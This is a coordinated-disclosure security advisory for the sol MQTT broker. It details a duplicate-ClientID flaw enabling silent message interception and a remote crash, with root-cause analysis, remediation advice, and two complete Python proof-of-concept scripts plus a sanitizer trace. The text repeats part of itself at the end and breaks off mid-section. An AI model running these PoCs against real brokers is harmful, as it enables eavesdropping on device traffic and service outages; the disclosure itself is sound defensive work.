Executive Summary
The sol MQTT broker (self-identified as MQTT 3.1.1, sol.c:62) fails to disconnect an existing client when a second connection reuses the same ClientID, in violation of the binding MQTT 3.1.1 requirement [MQTT-3.1.4-2] ("the Server MUST disconnect the existing Client"). Because sol relies on uthash without deduplication and routes publishes by first-match bucket lookup, an attacker who knows or guesses a victim's ClientID can (a) silently receive all of the victim's subsequently-published subscribed-topic messages while the victim's connection stays open and receives nothing, and (b) trigger a remote null-dereference / use-after-free crash that takes down the entire single-process broker for every connected client. Both consequences reproduce dynamically from the network with two client connections plus a publisher; under the default allow_anonymous=true configuration no credentials are required.
poc.zip
Metadata
| Field |
Value |
| Affected product |
sol MQTT broker — version 0.18.5 (and, in all likelihood, every release that carries this connect_handler / shared-session design) |
| Component |
Connection & session management — connect_handler (src/handlers.c), publish_message, ack handlers, inflight-retry cron (src/server.c), struct client_session (src/sol_internal.h) |
| Authentication |
Pre-auth under the compiled default allow_anonymous=true (config.c:368). With authentication enabled, any single valid low-privilege account suffices to intercept/crash other clients. |
| Embargo / coordinated disclosure |
Target disclosure window: 90 days from first contact; exact public-disclosure date to be agreed with the maintainer |
| Status |
Coordinated / responsible disclosure — not yet public |
Affected versions & configuration
- Version: sol 0.18.5 (set in
CMakeLists.txt:4), C, source root src/.
- Protocol: MQTT 3.1.1 —
sol.c:62 prints Sol v%s MQTT broker 3.1.1; README.md:8 advertises "almost all MQTT v3.1.1 commands". The CONNECT unpacker never inspects the protocol-level byte (mqtt.c:223-227 skips straight past it), and no v5.0 property/reason-code path exists anywhere in src/. The binding bar for this implementation is therefore the MQTT 3.1.1 spec, with v5.0 cited only as context.
- Configuration:
allow_anonymous = true is the compiled-in default (config.c:368 in config_set_default()); it is flipped to false only by an explicit config line equal to the string "false" (config.c:246-251). Under the default the issue is pre-auth.
- The crash race requires a non-zero worker-thread pool:
THREADSNR = 2 is the default (server.h:39), so the race is present in default builds. With THREADSNR == 0 the hijack still occurs but the concurrent-ref_dec crash is not reachable (single-threaded serialisation).
- Most likely all prior versions with this
connect_handler / shared-session design are affected; we have only independently verified 0.18.5.
Technical overview
A single missing control — disconnecting the existing live connection on a duplicate-ClientID CONNECT — yields two distinct, both-network-observable consequences:
-
Silent subscription/message-stream interception. When a second CONNECT arrives with a ClientID already present in server.clients_map, sol leaves the original connection alive and prepends the new client into the same uthash bucket. publish_message resolves subscribers via first-match bucket lookup, so the most-recently-added connection (the attacker) deterministically receives subsequent PUBLISHes for that ClientID/session, while the still-connected victim silently receives nothing. The victim gets no DISCONNECT, so the interception is invisible.
-
Remote crash DoS. With clean_session=false, the second CONNECT also reuses the victim's struct client_session by pointer with no session-level lock. The inflight-retry cron (inflight_msg_check, registered every 1 s, re-sending anything held > 20 s) iterates all clients including both colliding entries and operates concurrently on the shared session's i_msgs[] / refcounts across the two worker threads. A PUBACK clearing an inflight slot on one connection can race against a duplicate/cron-driven clear on the other, producing a ref_dec on a NULL packet pointer and a SEGV that aborts the whole broker.
Root cause analysis
1. The "kick out" comment is dead code; no existing connection is ever closed.
connect_handler carries an aspirational comment but performs no eviction:
/* handlers.c:390-393 */
/*
* Add the new connected client to the global map, if it is already
* connected, kick him out accordingly to the MQTT v3.1.1 specs.
*/
The code below it looks up only the session table and never the live-connection table:
/* handlers.c:400-405 */
HASH_FIND_STR(server.sessions, cc->client_id, cc->session);
if (cc->session && c->bits.clean_session == true)
HASH_DEL(server.sessions, cc->session); /* removes only the SESSION entry */
else if (cc->session)
session_present = 1; /* session-reuse branch */
server.sessions is the session store; the live connections live in server.clients_map. There is no HASH_FIND_STR on server.clients_map anywhere in connect_handler — the only such lookup in the file is in publish_message (handlers.c:167). There is no client_deactivate() call and no DISCONNECT send on the colliding path. The client_deactivate() call sites are exclusively on a client's own read-error/disconnect teardown (server.c:709/833/884), and the only HASH_DEL(server.clients_map, ...) lives inside client_deactivate (server.c:441), never on connect. So the pre-existing connection stays authenticated and online (its online flag, set at client_init/accept in server.c:383, is cleared only in its own client_deactivate at server.c:425).
The session-HASH_DEL at line 403 and the session_present=1 at line 405 touch only the session table, never the live socket.
2. Duplicate ClientID keys coexist in clients_map.
/* handlers.c:425 */
HASH_ADD_STR(server.clients_map, client_id, cc); /* unconditional */
This call is guarded only by the global mutex (taken at handlers.c:397), not by any duplicate-key check. sol's bundled uthash does not deduplicate: HASH_ADD_TO_BKT (src/uthash.h:869-884) merely prepends addhh to the bucket's hh_head list with no key-equality check, and HASH_ADD_TO_TABLE (uthash.h:376-385) likewise enforces no uniqueness. Two struct client entries with identical client_id therefore coexist.
3. The colliding CONNECT reuses the victim's session by pointer.
On the clean_session=false collision path, the session-reuse branch is taken and allocation is skipped:
/* handlers.c:416 */
if (c->bits.clean_session == true || !cc->session) {
cc->session = client_session_alloc(cc->client_id); /* NOT taken on reuse */
...
}
Since cc->session was already populated by the HASH_FIND_STR at line 400, the new client's cc->session ends up pointing to the same struct client_session the already-connected victim is using. Three references to one struct now coexist: the server.sessions uthash entry, the victim's c->session, and the attacker's cc->session. No deep copy occurs. session_present=1 (handlers.c:405) is later passed to set_connack (handlers.c:471) as the CONNACK Session-Present flag (set_connack writes 0 | (sp & 0x1) << 0, handlers.c:311) — observed as SP=1 in the PoC.
4. Routing uses first-match bucket lookup → newest connection wins.
/* handlers.c:167 */
HASH_FIND_STR(server.clients_map, s->session_id, sc);
HASH_FIND_STR → HASH_FIND → HASH_FIND_BYHASHVALUE → HASH_FIND_IN_BKT (src/uthash.h:846-866) walks the bucket chain from hh_head and breaks on the first key match (uthash.h:853-857). Because HASH_ADD_TO_BKT prepends (uthash.h:873-878), hh_head is the most-recently-added entry. Both connections hash to the same bucket (identical key string), so the lookup returns the attacker (B, added second). This is why subsequent PUBLISHes for that ClientID are delivered to the attacker and not to the victim.
(Clarifying "head": here "head" means the bucket's hh_head, set by prepend = most-recently-added — not the global uthash list head, which HASH_APPEND_LIST appends to. The publish-routing path uses the bucket chain, so "most-recently-added" is the right description.)
5. No session-level lock; the shared session is mutated concurrently.
struct client_session (sol_internal.h:225-244) has no pthread_mutex_t member — only UT_hash_handle hh and struct ref refcount. The per-client lock lives on struct client (sol_internal.h:208), not the session. The ack handlers that DECREF inflight packets lock only the calling client's mutex:
/* handlers.c:791, 793-794 */
pthread_mutex_lock(&c->mutex);
...
inflight_msg_clear(&c->session->i_msgs[pkt_id]); /* DECREF(packet) then ... */
c->session->i_msgs[pkt_id].packet = NULL; /* ... clears the slot */
pubcomp_handler (handlers.c:839-855, DECREF at line 848) follows the same single-c->mutex pattern. Because c1->session == c2->session but c1->mutex != c2->mutex, two threads can mutate the same i_msgs[] / i_acks[] / inflights / next_free_mid with no lock in common.
Precision on locking asymmetry (important): the publish side of these mutations is guarded — publish_message takes the global mutex (handlers.c:152), which covers next_free_mid() (line 189) and the inflight writes (lines 202-204 offline / 216-218 online). The ack side (puback/pubcomp) takes only c->mutex, not the global mutex. (Note: pubrec_handler at handlers.c:803-820 does take c->mutex at line 809, but its only shared-session write — c->session->i_acks[pkt_id] = time(NULL) at line 817 — sits outside that lock; it does not mutate i_msgs[] and does not DECREF, so it is the weakest example of the pattern.) The hazard is the missing lock shared between c1->mutex and c2->mutex, combined with the ack side bypassing the global lock that protects the publish side. That asymmetry, plus the absence of any session-level lock, is the real root cause.
6. The inflight-retry cron is the path that hits both colliding connections.
/* server.c:327-330 */
// TODO remove 20 hardcoded value
...
if (c->session->i_msgs[i].packet &&
(now - c->session->i_msgs[i].seen) > 20) {
The cron is registered to fire every 1 second:
/* server.c:937 */
ev_register_cron(&ctx, inflight_msg_check, NULL, 1, 0);
Critically, inflight_msg_check iterates clients with HASH_ITER (server.c:319), which visits every entry — including both colliding entries with the duplicate ClientID. The publish-routing path, by contrast, uses HASH_FIND_STR (first-match only) and thus funnels traffic to a single connection. This routing-vs-cron iteration difference is precisely why the 20 s-retry cron path — and only it — concurrently replays the shared i_msgs[], creating the double-ref_dec / NULL-packet window that crashes the broker. This also explains why naive high-throughput stress (routing-funnelled) does not crash, while the deliberate unacked-inflight + takeover sequence does.
Specification context
sol is an MQTT 3.1.1 broker. The binding obligation it violates is the OASIS MQTT 3.1.1 requirement, numbered [MQTT-3.1.4-2] in the 3.1.1 spec (note: in the 3.1.1 numbering scheme — the collision rule's ID differs in v5.0; see the correction below):
MQTT 3.1.1 §3.1.4 [MQTT-3.1.4-2]: "If the ClientID represents a Client already connected to the Server then the Server MUST disconnect the existing Client [MQTT-3.1.4-2]."
sol does not comply: on a duplicate ClientID it neither sends a DISCONNECT to nor closes the pre-existing live connection.
For informational context, MQTT v5.0 strengthens the same obligation (and assigns it a different normative ID, [MQTT-3.1.4-3], not [MQTT-3.1.4-2]). From the v5.0 spec text:
§3.1.4 "CONNECT Actions", lines 4760-4765: "If the ClientID represents a Client already connected to the Server, the Server sends a DISCONNECT packet to the existing Client with Reason Code of 0x8E (Session taken over) as described in section 4.13 and MUST close the Network Connection of the existing Client [MQTT-3.1.4-3]."
Normative-statement table (lines 12316-12324) restates [MQTT-3.1.4-3] verbatim.
Reason-code definition (line 9211): "142 0x8E Session taken over Server Another Connection using the same ClientID has connected causing this Connection to be closed."
Numbering correction (please cite carefully): the two specs use different IDs for the collision rule. In MQTT 3.1.1 it is [MQTT-3.1.4-2]; in MQTT v5.0 the collision/takeover rule is [MQTT-3.1.4-3] — v5.0's [MQTT-3.1.4-2] is a different statement about authentication/authorization checks (MQTT-v5.0.txt:4749 / 12308-12314). Because sol is a 3.1.1 broker, the binding requirement it fails is the 3.1.1 [MQTT-3.1.4-2] "MUST disconnect the existing Client". The v5.0 [MQTT-3.1.4-3] 0x8E-DISCONNECT requirement is informational context showing how the obligation is strengthened in the newer spec; it is not a normative bar that a 3.1.1-only implementation is held to (sol already fails the lower 3.1.1 bar by leaving the old connection live).
Impact
-
Confidentiality (High). The victim's entire subsequent subscribed-topic message stream is silently diverted to the attacker. The PoC shows that after the attacker's collision CONNECT, the victim receives nothing (CLAIM3: A msgs=[]) while the attacker receives every PUBLISH (CLAIM2: B msgs=[b'hijacked-2']). For IoT deployments where ClientIDs are frequently fixed/guessable device identifiers, this is a full-stream disclosure.
-
Integrity (High). The attacker becomes a silent MITM on the victim's stream — able to swallow, forge, or replay commands destined for IoT devices. Separately, the shared-session race corrupts the victim's next_free_mid / i_msgs[] / i_acks[] / inflights state, so even non-intercepted traffic is at risk of misdelivery or silent loss.
-
Availability (High). The concurrent double-clear of a shared inflight slot drives ref_dec on a NULL packet pointer (SEGV on unknown address 0x80 (WRITE, zero page) in ref_dec at ref.h:52, reached via puback_handler at handlers.c:793). This is a structural null/UAF dereference that will SIGSEGV a release build as well — it is not an ASan-only artifact; ASan merely makes reproduction reliable. Because sol is a single process with no SIGSEGV handler, the crash takes the broker down for every connected client.
-
Stealth. Because sol never sends a DISCONNECT (let alone a v5.0 0x8E "Session taken over") to the displaced client, the victim's connection shows no sign of having been taken over — its keepalive PINGREQ/PINGRESP still round-trips (PoC CLAIM1). Detection by the victim requires correlating a silent drop in message delivery with a takeover event, which is impractical in normal telemetry.
-
Exploitability framing. The hijack is low-complexity and reliable at normal connection counts. The crash is timing-gated but the window is fully attacker-controlled (the attacker chooses PUBACK cadence and the takeover instant), so it does not rise to AC:H; note that bare high-throughput stress (~1.1M messages) does not crash because routing funnels traffic to a single connection and starves the concurrent-ack condition — the reliable trigger is the deliberate unacked-inflight + takeover sequence shown in the crash PoC.
Proof of Concept
All PoCs are bare MQTT 3.1.1 over plain TCP; no third-party Python dependencies. They target 127.0.0.1:1884 against sol_bin (hijack) or sol_asan (crash). Files live in-tree at poc/.
Build & run
cd /path/to/sol
# Release build (for the hijack PoC):
cmake -B build-release && cmake --build build-release -- -j
# ASan/UBSan build (for the crash PoC):
cmake -B build-debug -DDEBUG=ON && cmake --build build-debug -- -j
# Run the broker with the minimal plain-TCP config (omits cafile so tls=false),
# binding 127.0.0.1:1884, and record its PID for the crash PoC's watchdog:
./build-debug/sol -c sol_poc.conf & echo $! > /tmp/sol_asan.pid
# Hijack (7/7):
python3 mqtt004_hijack.py
# Crash (~40 s; tail the broker's stderr or check exit code):
python3 mqtt004_cron_race.py
PoC 1 — silent subscription/message hijack (mqtt004_hijack.py)
Minimal reproducer (self-contained; verbatim from the verified file):
#!/usr/bin/env python3
"""MQTT_004 PoC - ClientID-collision subscription/message hijack against sol.
Bucket-A (fully network-observable). Raw MQTT 3.1.1 over plain TCP, no deps."""
import socket, struct, time, sys
HOST, PORT = "127.0.0.1", 1884
VICTIM_ID = "victim-device-001"
TOPIC = "secret/sensor/data"
def rl(n):
out = bytearray()
while True:
b = n % 128; n //= 128
if n: b |= 128
out.append(b)
if not n: break
return bytes(out)
def s16(s):
b = s.encode() if isinstance(s, str) else s
return struct.pack("!H", len(b)) + b
def pkt(typ, flags, payload):
return bytes([((typ & 0xF) << 4) | (flags & 0xF)]) + rl(len(payload)) + payload
def connect(client_id, clean=True, keepalive=60, username=None, password=None):
vh = s16("MQTT") + b"\x04" # level 4 == 3.1.1
flags = 0x02 if clean else 0x00 # bit1 = clean session
pl = s16(client_id)
if username is not None: flags |= 0x80; pl += s16(username)
if password is not None: flags |= 0x40; pl += s16(password)
vh += struct.pack("!BH", flags, keepalive)
return pkt(1, 0, vh + pl) # CONNECT = 1
def subscribe(pktid, topic, qos=0):
return pkt(8, 0x02, struct.pack("!H", pktid) + s16(topic) + bytes([qos]))
def publish(topic, msg, qos=0, retain=False):
flags = (qos << 1) | (0x01 if retain else 0x00)
payload = s16(topic)
if qos > 0: payload += struct.pack("!H", 1)
return pkt(3, flags, payload + (msg.encode() if isinstance(msg, str) else msg))
PINGREQ = bytes([0xC0, 0x00])
DISCONNECT = bytes([0xE0, 0x00])
def recvn(sock, n):
buf = b""
while len(buf) < n:
chunk = sock.recv(n - len(buf))
if not chunk: raise ConnectionError("peer closed")
buf += chunk
return buf
def recv_pkt(sock, timeout=2.0):
sock.settimeout(timeout)
try:
hdr = recvn(sock, 1)
except socket.timeout:
return None
if not hdr: return None
t = hdr[0] >> 4; flags = hdr[0] & 0xF
mult = 1; rem = 0; got = 0
while True:
b = recvn(sock, 1)[0]; got += 1
rem += (b & 0x7F) * mult
if not (b & 0x80): break
mult *= 128
if got > 4: return None
payload = recvn(sock, rem) if rem else b""
return (t, flags, payload)
def drain(sock, t=0.4):
out = []
while True:
p = recv_pkt(sock, timeout=t)
if p is None: break
out.append(p)
return out
def parse_publish(payload):
tlen = struct.unpack("!H", payload[:2])[0]
topic = payload[2:2 + tlen].decode(errors="replace")
msg = payload[2 + tlen:]
return topic, msg
def main():
results = []
def check(name, cond, detail=""):
results.append((name, cond, detail))
print(f" [{'PASS' if cond else 'FAIL'}] {name}" + (f" - {detail}" if detail else ""))
# A: victim - clean=False so session is reused on collision
A = socket.create_connection((HOST, PORT))
A.sendall(connect(VICTIM_ID, clean=False))
ack = recv_pkt(A)
check("A CONNECT accepted", ack and ack[0] == 2 and ack[2][1] == 0,
f"CONNACK rc={ack[2][1] if ack else 'none'}")
A.sendall(subscribe(1, TOPIC, 0))
suback = recv_pkt(A)
check("A SUBSCRIBE acked", suback and suback[0] == 9,
f"SUBACK granted={list(suback[2][2:]) if suback else 'none'}")
# Publisher P
P = socket.create_connection((HOST, PORT))
P.sendall(connect("publisher-X", clean=True)); recv_pkt(P)
# Baseline: A should get a publish before the hijack
P.sendall(publish(TOPIC, "baseline-1")); time.sleep(0.4)
base_recv = [p for p in drain(A) if p[0] == 3]
check("baseline: A receives PUBLISH before hijack",
any(parse_publish(p[2])[1] == b"baseline-1" for p in base_recv),
f"{len(base_recv)} publish(es) on A")
# Attacker B: SAME ClientID, clean=False -> reuses A's session
B = socket.create_connection((HOST, PORT))
B.sendall(connect(VICTIM_ID, clean=False))
back = recv_pkt(B)
check("B CONNECT accepted (collision)", back and back[0] == 2 and back[2][1] == 0,
f"CONNACK rc={back[2][1] if back else 'none'}, SP={back[2][0] if back else '?'}")
# CLAIM1: A still alive after takeover (sol did NOT close it)
time.sleep(0.5); A.sendall(PINGREQ); pr = recv_pkt(A, timeout=2.0)
check("CLAIM1: A still alive after takeover (sol did NOT close it)",
pr is not None and pr[0] == 13, # 13 == PINGRESP
"PINGRESP received" if pr and pr[0] == 13 else
(f"got type={pr[0]}" if pr else "no response (closed?)"))
# CLAIM2/3: who gets the post-takeover publish?
P.sendall(publish(TOPIC, "hijacked-2")); time.sleep(0.6)
a_msgs = [parse_publish(p[2])[1] for p in drain(A, 0.4) if p[0] == 3]
b_msgs = [parse_publish(p[2])[1] for p in drain(B, 0.4) if p[0] == 3]
check("CLAIM2: attacker B receives the post-takeover PUBLISH",
any(m == b"hijacked-2" for m in b_msgs), f"B msgs={b_msgs}")
check("CLAIM3: victim A does NOT receive the post-takeover PUBLISH",
not any(m == b"hijacked-2" for m in a_msgs), f"A msgs={a_msgs}")
print("\n=== SUMMARY ===")
for n, c, _ in results: print(f" {'OK' if c else 'XX'} {n}")
hijack = all(c for _, c, _ in results[6:])
print(f"\nVERDICT: MQTT_004 hijack {'CONFIRMED' if hijack else 'NOT confirmed'} "
f"({sum(c for _,c,_ in results)}/{len(results)} checks passed)")
try:
B.sendall(DISCONNECT); B.close()
A.sendall(DISCONNECT); A.close()
P.sendall(DISCONNECT); P.close()
except OSError:
pass
if __name__ == "__main__":
try:
main()
except (ConnectionError, OSError) as e:
print(f"ERROR connecting to sol @ {HOST}:{PORT}: {e}", file=sys.stderr)
sys.exit(2)
Observed output (two independent clean runs, identical):
[PASS] A CONNECT accepted — CONNACK rc=0
[PASS] A SUBSCRIBE acked — SUBACK granted=[0]
[PASS] baseline: A receives PUBLISH before hijack — 1 publish(es) on A
[PASS] B CONNECT accepted (collision) — CONNACK rc=0, SP=1 ← SP=1 confirms session-reuse branch
[PASS] CLAIM1: A still alive after takeover (sol did NOT close it) — PINGRESP received
[PASS] CLAIM2: attacker B receives the post-takeover PUBLISH — B msgs=[b'hijacked-2']
[PASS] CLAIM3: victim A does NOT receive the post-takeover PUBLISH — A msgs=[]
VERDICT: MQTT_004 hijack CONFIRMED (7/7)
Note: the broker may also core-dump during the PoC's DISCONNECT teardown (observed aborted (core dumped) at the kill/wait line in two runs). That is a third symptom of the same shared-session/refcount bug (consistent with the cron-race UAF below), triggered by both A and B tearing down the same client_session. The 7 hijack assertions do not depend on the crash; report it as an additional crash vector, not as a flaw in the demonstration.
PoC 2 — remote crash via shared-session refcount race (mqtt004_cron_race.py)
Scenario: A (clean=false) subscribes at QoS1; the publisher P sends 39 QoS1 PUBLISHes that A does not ack (they stay inflight in the shared session's i_msgs); wait 22 s so sol's 20 s inflight-retry cron (server.c:329-330) is armed; then attacker B connects with the same ClientID (session reuse). The cron's HASH_ITER now visits both A and B (duplicate keys) and concurrently operates on the same i_msgs[]/refcounts across the two worker threads (THREADSNR=2). B's PUBACK of a dup retry racing with A's cron retry on the same slot drives ref_dec on a NULL packet pointer → SEGV.
Minimal harness (verbatim from the verified file; it imports codec helpers from mqtt004_race.py):
import socket, struct, time, sys
sys.path.insert(0, '.')
from mqtt004_race import connect, subscribe, publish_qos1, recv_pkt, recvn, rl, s16, pkt
HOST, PORT = "127.0.0.1", 1884
VID = "victim-cron-001"; TOPIC = "secret/cron"
def conn(cid, clean=True):
s = socket.create_connection((HOST, PORT))
s.sendall(connect(cid, clean)); recv_pkt(s, 2); return s
A = conn(VID, False); A.sendall(subscribe(1, TOPIC, 1)); recv_pkt(A, 2)
P = conn("pub-cron", True)
# Send QoS1 publishes; A will NOT ack -> they stay inflight in the shared session
for m in range(1, 40):
P.sendall(publish_qos1(TOPIC, f"hold-{m}", m))
print("sent 39 unacked qos1 -> inflight in shared session; waiting 22s for >20s retry cron...", flush=True)
time.sleep(22)
# Now attacker B reuses the session; cron HASH_ITER will hit BOTH A and B sharing session
B = conn(VID, False)
print("B connected (collision, session reuse). Watching 15s for crash/corruption...", flush=True)
t0 = time.time(); crash = False
while time.time() - t0 < 15:
if not __import__('os').path.exists(f"/proc/{open('/tmp/sol_asan.pid').read().strip()}"):
crash = True; break
# B acks whatever dup retries it gets, racing with A's cron retries on shared i_msgs
try:
p = recv_pkt(B, 0.3)
if p and p[0] == 3 and (p[1] & 0x06):
pl = p[2]; tl = struct.unpack("!H", pl[:2])[0]
mid = struct.unpack("!H", pl[2 + tl:4 + tl])[0]
B.sendall(pkt(4, 0, struct.pack("!H", mid))) # PUBACK
except (socket.timeout, ConnectionError, OSError):
pass
print("CRASHED" if crash else "no crash in window")
for s in (A, B, P):
try: s.close()
except: pass
Harness caveat (does not affect the bug's validity): the in-process /proc/PID watchdog can be defeated if the Python client itself first trips struct.error: unpack requires a buffer of 2 bytes on a short/malformed dup retry it receives on B. The broker does still crash — confirmed by reading the broker's stderr log, which contains the full ASan SEGV trace and ==ABORTING==, and by kill -0 showing the process dead. For reliable reporting, harden the harness by wrapping the recv/parse in try/except to ignore short/malformed re-sends, or simply tail the broker's stderr / exit code. The PID file /tmp/sol_asan.pid must be written by the launcher (or the harness needs a fallback), since the watchdog reads it.
Suggested remediation
These are suggestions, not demands. The minimal, spec-aligned fix is the first item; the rest harden the shared-session invariant.
-
Disconnect the existing client on ClientID collision (binding 3.1.1 [MQTT-3.1.4-2]). In connect_handler, before HASH_ADD_STR(server.clients_map, client_id, cc) at handlers.c:425, perform a HASH_FIND_STR(server.clients_map, cc->client_id, existing); if found and existing != cc, send it a DISCONNECT (MQTT v5.0: Reason Code 0x8E "Session taken over", per [MQTT-3.1.4-3]; MQTT 3.1.1: a bare DISCONNECT) and tear it down via the existing client_deactivate() path before adding the new client. This makes the long-standing "kick him out" comment at handlers.c:390-393 finally true and removes the duplicate-key ambiguity entirely.
-
Do not let two live connections share one struct client_session without synchronisation. Either (a) disallow session reuse while a connection for that ClientID is still online (fail the second CONNECT or take it over atomically as above), or (b) give struct client_session its own pthread_mutex_t and require it for every mutation of i_msgs[] / i_acks[] / inflights / next_free_mid, including the publish path, the ack handlers (puback/pubrec/pubcomp), and the inflight_msg_check cron. Today the publish side holds only the global mutex while the ack side holds only c->mutex — there is no lock shared between the two colliding clients, which is the precise root cause of the crash.
-
Close the locking asymmetry explicitly. If a session-level lock is added, ensure the inflight-retry cron (server.c:308-352, which HASH_ITERs and so touches both colliding entries) and the ack handlers take it; today the cron's per-client c->mutex lock (server.c:324) does not serialise access to the shared session because the two colliding clients hold different c->mutex instances. Also move pubrec_handler's c->session->i_acks[pkt_id] = time(NULL) (handlers.c:817) inside its c->mutex critical section, or under the new session lock, so it stops being a data race.
-
Consider replacing the unguarded HASH_ADD_STR semantics. Even after fix 1, an explicit "already-present" check before insertion is safer than relying on uthash's duplicate-key tolerance; it makes the routing table's single-winner invariant a code-level guarantee rather than a uthash-implementation detail (and pre-empts any future expansion-induced ordering surprise, where HASH_EXPAND_BUCKETS can reverse intra-bucket order and flip the winner).
References
- MQTT v3.1.1 specification, §3.1.4, normative statement [MQTT-3.1.4-2] — "If the ClientID represents a Client already connected to the Server then the Server MUST disconnect the existing Client." (OASIS MQTT Version 3.1.1.)
- MQTT v5.0 specification, §3.1.4 / normative table, statement [MQTT-3.1.4-3] — "...the Server sends a DISCONNECT packet to the existing Client with Reason Code of 0x8E (Session taken over) ... and MUST close the Network Connection of the existing Client." (local copy:
RFC/MQTT-v5.0.txt, lines 4760-4765 and 12316-12324; reason-code definition at line 9211.)
- sol source (version 0.18.5), root
src/:
handlers.c:390-393 — dead "kick out" comment.
handlers.c:400-405 — session lookup / HASH_DEL / session_present.
handlers.c:416 — session-reuse branch (skips allocation).
handlers.c:425 — unconditional duplicate-key HASH_ADD_STR.
handlers.c:167 — HASH_FIND_STR first-match routing in publish_message.
handlers.c:152, 189, 202-204, 216-218 — publish side guarded by global mutex.
handlers.c:791-794, 803-820, 839-855 — ack handlers locking only c->mutex while mutating the shared session (note pubrec's i_acks write at 817 sits outside its lock).
handlers.c:309-311 — set_connack writes Session-Present at bit 0.
sol_internal.h:225-244 — struct client_session with no mutex; sol_internal.h:208 — struct client carries the mutex.
server.c:308-352, 937 — inflight-retry cron, 20 s threshold, 1 s cadence, HASH_ITER over clients_map.
server.c:319, 324 — cron HASH_ITER + per-client c->mutex.
server.c:381-404 — client_init (sets online=true at 383, inits c->mutex at 403).
server.c:412-446 — client_deactivate (clears online at 425, HASH_DEL(clients_map) at 441).
server.h:39 — THREADSNR = 2 default.
ref.h:50-52 — ref_dec (the crash site).
uthash.h:846-866 (HASH_FIND_IN_BKT, first match), 869-884 (HASH_ADD_TO_BKT, prepend), 951-973 (HASH_EXPAND_BUCKETS, order reversal).
sol.c:62, README.md:8 — MQTT 3.1.1 self-identification; CMakeLists.txt:4 — VERSION 0.18.5.
config.c:368, 246-251 — allow_anonymous=true default.
- PoCs:
PLVerifier/buchi_verify_workspace/sol/MQTT_004/poc/{mqtt004_hijack.py, mqtt004_cron_race.py, mqtt004_race.py, poc_report.md}.
Appendix A — ASan/UBSan stack trace (verbatim)
Reproduced by running sol_asan (-DDEBUG=ON, ASan+UBSan) on 127.0.0.1:1884 and executing mqtt004_cron_race.py. UBSan fires first, then ASan:
handlers.c:793:5: runtime error: member access within null pointer of type 'struct mqtt_packet'
ERROR: AddressSanitizer: SEGV on unknown address 0x000000000080 (WRITE)
The signal is caused by a WRITE to memory with address #0x000000000080 with insufficient permissions.
#0 0x... in ref_dec src/ref.h:52
#1 0x... in puback_handler src/handlers.c:793 <- inflight_msg_clear(&c->session->i_msgs[pkt_id])
#2 0x... in handle_command src/handlers.c:879
#3 0x... in process_message src/server.c:867
#4 0x... in read_callback src/server.c:794
#5 0x... in ev_process_event src/ev.c:656
#6 0x... in ev_run src/ev.c:761
#7 0x... in eventloop_start src/server.c:940
#8 0x... in start_server src/server.c:1019
#9 0x... in main src/sol.c:128
SUMMARY: AddressSanitizer: SEGV src/ref.h:52 in ref_dec
==ABORTING==
Root-cause characterisation of the 0x80 address: the accessed pointer is NULL (an i_msgs[pkt_id] slot that was cleared by a prior puback_handler run at handlers.c:794, c->session->i_msgs[pkt_id].packet = NULL), and a concurrent/duplicate puback re-enters inflight_msg_clear and calls ref_dec on that NULL packet. In the debug build, &((struct mqtt_packet *)0)->refcount == 0x78; struct ref { void (*free)(...); volatile atomic_int count; }, so count lives at 0x78 + 8 == 0x80. ref_dec line 52 decrements count, i.e. writes packet + 0x80; with packet == NULL that write lands at address 0x80 in the zero page → SEGV. The precise classification is therefore a concurrent double-clear of a shared inflight slot that DECREFs a NULL packet pointer, leading to a near-null-page write; "use-after-free" is acceptable shorthand, but the exact root cause is the unprotected shared-session NULL slot, which is why ASan reports a SEGV/DEADLYSIGNAL rather than a heap-use-after-free report.
Executive Summary
The sol MQTT broker (self-identified as MQTT 3.1.1,
sol.c:62) fails to disconnect an existing client when a second connection reuses the same ClientID, in violation of the binding MQTT 3.1.1 requirement [MQTT-3.1.4-2] ("the Server MUST disconnect the existing Client"). Because sol relies onuthashwithout deduplication and routes publishes by first-match bucket lookup, an attacker who knows or guesses a victim's ClientID can (a) silently receive all of the victim's subsequently-published subscribed-topic messages while the victim's connection stays open and receives nothing, and (b) trigger a remote null-dereference / use-after-free crash that takes down the entire single-process broker for every connected client. Both consequences reproduce dynamically from the network with two client connections plus a publisher; under the defaultallow_anonymous=trueconfiguration no credentials are required.poc.zip
Metadata
connect_handler/ shared-session design)connect_handler(src/handlers.c),publish_message, ack handlers, inflight-retry cron (src/server.c),struct client_session(src/sol_internal.h)allow_anonymous=true(config.c:368). With authentication enabled, any single valid low-privilege account suffices to intercept/crash other clients.Affected versions & configuration
CMakeLists.txt:4), C, source rootsrc/.sol.c:62printsSol v%s MQTT broker 3.1.1;README.md:8advertises "almost all MQTT v3.1.1 commands". The CONNECT unpacker never inspects the protocol-level byte (mqtt.c:223-227skips straight past it), and no v5.0 property/reason-code path exists anywhere insrc/. The binding bar for this implementation is therefore the MQTT 3.1.1 spec, with v5.0 cited only as context.allow_anonymous = trueis the compiled-in default (config.c:368inconfig_set_default()); it is flipped tofalseonly by an explicit config line equal to the string"false"(config.c:246-251). Under the default the issue is pre-auth.THREADSNR = 2is the default (server.h:39), so the race is present in default builds. WithTHREADSNR == 0the hijack still occurs but the concurrent-ref_deccrash is not reachable (single-threaded serialisation).connect_handler/ shared-session design are affected; we have only independently verified 0.18.5.Technical overview
A single missing control — disconnecting the existing live connection on a duplicate-ClientID CONNECT — yields two distinct, both-network-observable consequences:
Silent subscription/message-stream interception. When a second CONNECT arrives with a ClientID already present in
server.clients_map, sol leaves the original connection alive and prepends the new client into the same uthash bucket.publish_messageresolves subscribers via first-match bucket lookup, so the most-recently-added connection (the attacker) deterministically receives subsequent PUBLISHes for that ClientID/session, while the still-connected victim silently receives nothing. The victim gets no DISCONNECT, so the interception is invisible.Remote crash DoS. With
clean_session=false, the second CONNECT also reuses the victim'sstruct client_sessionby pointer with no session-level lock. The inflight-retry cron (inflight_msg_check, registered every 1 s, re-sending anything held > 20 s) iterates all clients including both colliding entries and operates concurrently on the shared session'si_msgs[]/ refcounts across the two worker threads. A PUBACK clearing an inflight slot on one connection can race against a duplicate/cron-driven clear on the other, producing aref_decon aNULLpacket pointer and a SEGV that aborts the whole broker.Root cause analysis
1. The "kick out" comment is dead code; no existing connection is ever closed.
connect_handlercarries an aspirational comment but performs no eviction:The code below it looks up only the session table and never the live-connection table:
